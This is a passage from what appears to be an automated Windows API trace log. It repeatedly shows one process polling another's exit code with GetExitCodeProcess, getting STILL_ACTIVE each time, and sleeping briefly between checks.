lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0109.107] Sleep (dwMilliseconds=0x19) [0109.190] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0109.190] Sleep (dwMilliseconds=0x19) [0109.267] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0109.267] Sleep (dwMilliseconds=0x19) [0109.357] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0109.357] Sleep (dwMilliseconds=0x19) [0109.443] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0109.443] Sleep (dwMilliseconds=0x19) [0109.643] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0109.643] Sleep (dwMilliseconds=0x19) [0109.759] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0109.759] Sleep (dwMilliseconds=0x19) [0109.857] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0109.857] Sleep (dwMilliseconds=0x19) [0109.933] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0109.933] Sleep (dwMilliseconds=0x19) [0110.007] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0110.007] Sleep (dwMilliseconds=0x19) [0110.092] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0110.092] Sleep (dwMilliseconds=0x19) [0110.180] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0110.180] Sleep (dwMilliseconds=0x19) [0110.266] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0110.266] Sleep (dwMilliseconds=0x19) [0110.340] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0110.341] Sleep (dwMilliseconds=0x19) [0110.423] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0110.424] Sleep (dwMilliseconds=0x19) [0110.630] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0110.630] Sleep (dwMilliseconds=0x19) [0110.700] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0110.700] Sleep (dwMilliseconds=0x19) [0110.769] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0110.769] Sleep (dwMilliseconds=0x19) [0110.838] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0110.838] Sleep (dwMilliseconds=0x19) [0110.927] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0110.927] Sleep (dwMilliseconds=0x19) [0110.997] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0110.997] Sleep (dwMilliseconds=0x19) [0111.072] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.073] Sleep (dwMilliseconds=0x19) [0111.142] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.143] Sleep (dwMilliseconds=0x19) [0111.179] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.179] Sleep (dwMilliseconds=0x19) [0111.215] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.216] Sleep (dwMilliseconds=0x19) [0111.250] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.250] Sleep (dwMilliseconds=0x19) [0111.293] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.293] Sleep (dwMilliseconds=0x19) [0111.331] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.331] Sleep (dwMilliseconds=0x19) [0111.368] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.368] Sleep (dwMilliseconds=0x19) [0111.404] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.404] Sleep (dwMilliseconds=0x19) [0111.439] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.439] Sleep (dwMilliseconds=0x19) [0111.474] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.474] Sleep (dwMilliseconds=0x19) [0111.626] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.626] Sleep (dwMilliseconds=0x19) [0111.746] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.746] Sleep (dwMilliseconds=0x19) [0111.814] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.814] Sleep (dwMilliseconds=0x19) [0111.871] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.871] Sleep (dwMilliseconds=0x19) [0111.909] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.909] Sleep (dwMilliseconds=0x19) [0111.945] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.945] Sleep (dwMilliseconds=0x19) [0111.981] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0111.981] Sleep (dwMilliseconds=0x19) [0112.017] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.017] Sleep (dwMilliseconds=0x19) [0112.054] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.054] Sleep (dwMilliseconds=0x19) [0112.092] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.092] Sleep (dwMilliseconds=0x19) [0112.164] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.164] Sleep (dwMilliseconds=0x19) [0112.202] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.202] Sleep (dwMilliseconds=0x19) [0112.237] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.237] Sleep (dwMilliseconds=0x19) [0112.272] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.272] Sleep (dwMilliseconds=0x19) [0112.308] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.308] Sleep (dwMilliseconds=0x19) [0112.344] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.344] Sleep (dwMilliseconds=0x19) [0112.380] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.380] Sleep (dwMilliseconds=0x19) [0112.416] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.416] Sleep (dwMilliseconds=0x19) [0112.451] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.451] Sleep (dwMilliseconds=0x19) [0112.489] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.489] Sleep (dwMilliseconds=0x19) [0112.526] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.526] Sleep (dwMilliseconds=0x19) [0112.711] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.711] Sleep (dwMilliseconds=0x19) [0112.747] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.747] Sleep (dwMilliseconds=0x19) [0112.784] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.784] Sleep (dwMilliseconds=0x19) [0112.818] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.818] Sleep (dwMilliseconds=0x19) [0112.964] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0112.964] Sleep (dwMilliseconds=0x19) [0113.020] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0113.021] Sleep (dwMilliseconds=0x19) [0113.089] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0113.089] Sleep (dwMilliseconds=0x19) [0113.129] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0113.129] Sleep (dwMilliseconds=0x19) [0113.163] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0113.163] Sleep (dwMilliseconds=0x19) [0113.201] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0113.202] Sleep (dwMilliseconds=0x19) [0113.237] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0113.237] Sleep (dwMilliseconds=0x19) [0113.287] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0113.287] Sleep (dwMilliseconds=0x19) [0113.328] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0113.328] Sleep (dwMilliseconds=0x19) [0113.362] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0113.362] Sleep (dwMilliseconds=0x19) [0113.398] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0113.398] Sleep (dwMilliseconds=0x19) [0113.434] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0113.434] Sleep (dwMilliseconds=0x19) [0113.482] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0113.482] Sleep (dwMilliseconds=0x19) [0113.523] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0113.523] Sleep (dwMilliseconds=0x19) [0113.942] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0113.942] Sleep (dwMilliseconds=0x19) [0113.979] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0113.979] Sleep (dwMilliseconds=0x19) [0114.021] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0114.021] Sleep (dwMilliseconds=0x19) [0114.056] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0114.056] Sleep (dwMilliseconds=0x19) [0114.093] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0114.093] Sleep (dwMilliseconds=0x19) [0114.136] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0114.136] Sleep (dwMilliseconds=0x19) [0114.170] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0114.170] Sleep (dwMilliseconds=0x19) [0114.208] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0114.208] Sleep (dwMilliseconds=0x19) [0114.285] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0114.285] Sleep (dwMilliseconds=0x19) [0114.336] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0114.337] Sleep (dwMilliseconds=0x19) [0114.379] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0114.379] Sleep (dwMilliseconds=0x19) [0114.431] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0114.431] Sleep (dwMilliseconds=0x19) [0114.466] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0114.466] Sleep (dwMilliseconds=0x19) [0114.500] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0114.500] Sleep (dwMilliseconds=0x19) [0114.537] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0114.537] Sleep (dwMilliseconds=0x19) [0114.573] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0114.573] Sleep (dwMilliseconds=0x19) [0114.806] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0114.806] Sleep (dwMilliseconds=0x19) [0114.841] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0114.841] Sleep (dwMilliseconds=0x19) [0114.896] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0114.896] Sleep (dwMilliseconds=0x19) [0114.932] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0114.932] Sleep (dwMilliseconds=0x19) [0114.980] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0114.981] Sleep (dwMilliseconds=0x19) [0115.029] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0115.029] Sleep (dwMilliseconds=0x19) [0115.064] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0115.064] Sleep (dwMilliseconds=0x19) [0115.105] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0115.105] Sleep (dwMilliseconds=0x19) [0115.140] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0115.140] Sleep (dwMilliseconds=0x19) [0115.178] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0115.178] Sleep (dwMilliseconds=0x19) [0115.212] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0115.212] Sleep (dwMilliseconds=0x19) [0115.249] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0115.249] Sleep (dwMilliseconds=0x19) [0115.284] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0115.284] Sleep (dwMilliseconds=0x19) [0115.331] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0115.331] Sleep (dwMilliseconds=0x19) [0115.379] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0115.379] Sleep (dwMilliseconds=0x19) [0115.420] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0115.420] Sleep (dwMilliseconds=0x19) [0115.468] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0115.468] Sleep (dwMilliseconds=0x19) [0115.511] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0115.511] Sleep (dwMilliseconds=0x19) [0115.556] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0115.557] Sleep (dwMilliseconds=0x19) [0115.824] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0115.829] Sleep (dwMilliseconds=0x19) [0115.923] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0115.923] Sleep (dwMilliseconds=0x19) [0115.961] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0115.961] Sleep (dwMilliseconds=0x19) [0115.995] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0115.995] Sleep (dwMilliseconds=0x19) [0116.032] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0116.032] Sleep (dwMilliseconds=0x19) [0116.066] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0116.066] Sleep (dwMilliseconds=0x19) [0116.116] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0116.116] Sleep (dwMilliseconds=0x19) [0116.151] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0116.151] Sleep (dwMilliseconds=0x19) [0116.189] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0116.189] Sleep (dwMilliseconds=0x19) [0116.227] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0116.227] Sleep (dwMilliseconds=0x19) [0116.261] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0116.261] Sleep (dwMilliseconds=0x19) [0116.295] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0116.295] Sleep (dwMilliseconds=0x19) [0116.330] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0116.330] Sleep (dwMilliseconds=0x19) [0116.364] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0116.364] Sleep (dwMilliseconds=0x19) [0116.399] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0116.399] Sleep (dwMilliseconds=0x19) [0116.435] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0116.435] Sleep (dwMilliseconds=0x19) [0116.582] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0116.582] Sleep (dwMilliseconds=0x19) [0117.034] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0117.034] Sleep (dwMilliseconds=0x19) [0117.073] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0117.074] Sleep (dwMilliseconds=0x19) [0117.109] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0117.109] Sleep (dwMilliseconds=0x19) [0117.143] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0117.144] Sleep (dwMilliseconds=0x19) [0117.181] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0117.181] Sleep (dwMilliseconds=0x19) [0117.214] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0117.214] Sleep (dwMilliseconds=0x19) [0117.249] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0117.249] Sleep (dwMilliseconds=0x19) [0117.283] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0117.283] Sleep (dwMilliseconds=0x19) [0117.317] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0117.317] Sleep (dwMilliseconds=0x19) [0117.351] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0117.351] Sleep (dwMilliseconds=0x19) [0117.391] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0117.391] Sleep (dwMilliseconds=0x19) [0117.425] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0117.425] Sleep (dwMilliseconds=0x19) [0117.459] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0117.459] Sleep (dwMilliseconds=0x19) [0117.494] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0117.495] Sleep (dwMilliseconds=0x19) [0117.528] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0117.529] Sleep (dwMilliseconds=0x19) [0117.562] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0117.562] Sleep (dwMilliseconds=0x19) [0118.013] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0118.013] Sleep (dwMilliseconds=0x19) [0118.071] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0118.071] Sleep (dwMilliseconds=0x19) [0118.105] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0118.105] Sleep (dwMilliseconds=0x19) [0118.140] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0118.140] Sleep (dwMilliseconds=0x19) [0118.177] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0118.177] Sleep (dwMilliseconds=0x19) [0118.213] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0118.213] Sleep (dwMilliseconds=0x19) [0118.247] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0118.247] Sleep (dwMilliseconds=0x19) [0118.281] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0118.281] Sleep (dwMilliseconds=0x19) [0118.943] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0118.943] Sleep (dwMilliseconds=0x19) [0119.209] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0119.209] Sleep (dwMilliseconds=0x19) [0119.275] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0119.275] Sleep (dwMilliseconds=0x19) [0119.321] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0119.321] Sleep (dwMilliseconds=0x19) [0119.358] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0119.359] Sleep (dwMilliseconds=0x19) [0119.397] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0119.398] Sleep (dwMilliseconds=0x19) [0119.477] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0119.477] Sleep (dwMilliseconds=0x19) [0119.511] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0119.511] Sleep (dwMilliseconds=0x19) [0120.062] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0120.062] Sleep (dwMilliseconds=0x19) [0120.100] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0120.100] Sleep (dwMilliseconds=0x19) [0120.161] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0120.161] Sleep (dwMilliseconds=0x19) [0120.201] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0120.201] Sleep (dwMilliseconds=0x19) [0120.446] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0120.446] Sleep 